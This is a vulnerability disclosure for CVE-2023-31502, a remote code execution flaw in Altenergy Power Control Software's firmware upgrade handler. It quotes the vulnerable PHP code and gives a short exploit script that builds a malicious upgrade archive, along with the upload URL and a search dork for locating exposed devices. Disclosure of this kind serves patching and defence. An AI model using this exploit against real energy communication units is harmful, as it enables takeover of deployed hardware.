Headline
CVE-2023-31502: Disclosures/Insufficient_Verification_of_Data_Authenticity.MD at main · ahmedalroky/Disclosures
Altenergy Power Control Software C1.2.5 was discovered to contain a remote code execution (RCE) vulnerability via the component /models/management_model.php.
title : insufficient verification of firmware integrity “Altenergy Power Control Software” led to RCE****SW ver: C1.2.5****Vendor: https://apsystems.com/****Google Dork: intitle:"Altenergy Power Control Software"****Affected device: ENERGY COMMUNICATION UNIT
POC Video :
vulnerable code :
“/home/local_web/pagesapplication/models/management_model.php”
public function exec_upgrade_ecu() { $results = array(); $res_array = array();
exec("rm -rf /tmp/update\_localweb/");
if ($\_FILES\["file"\]\["error"\] > 0)
{
array\_push($res\_array, "Return Code: " . $\_FILES\["file"\]\["error"\] . "<br />");
$results\["value"\] = 1;
}
else
{
array\_push($res\_array, "Upload: " . $\_FILES\["file"\]\["name"\] . "<br />");
array\_push($res\_array, "Type: " . $\_FILES\["file"\]\["type"\] . "<br />");
array\_push($res\_array, "Size: " . ($\_FILES\["file"\]\["size"\] / 1024) . " Kb<br />");
array\_push($res\_array, "Temp file: " . $\_FILES\["file"\]\["tmp\_name"\] . "<br />");
move\_uploaded\_file($\_FILES\["file"\]\["tmp\_name"\], "/tmp/" . $\_FILES\["file"\]\["name"\]);
array\_push($res\_array, "Stored in: " . "/tmp/" . $\_FILES\["file"\]\["name"\]);
exec("tar xjvf /tmp/".$\_FILES\["file"\]\["name"\]." -C /tmp");
exec("ls /tmp/update\_localweb/assist", $temp, $value);
exec("/tmp/update\_localweb/assist &");
$results\["value"\] = $value ? 1 : 0;
}
$results\["result"\] = implode("\\n",$res\_array);
return $results;
}
Exploit :
exploit.sh
#!/bin/bash mkdir update_localweb 2>/dev/null payload=’ping -c 1 ahvmb8ham4hkik6ifzt7o8puyl4hs6.burpcollaborator.net’ echo $payload > update_localweb/assist chmod 777 update_localweb/assist tar cjvf b4db0t.bin update_localweb/ rm -rf update_localweb
Browse to http://<IP_ADDR>/index.php/management/upgrade_ecu and upload b4db0t.bin POC :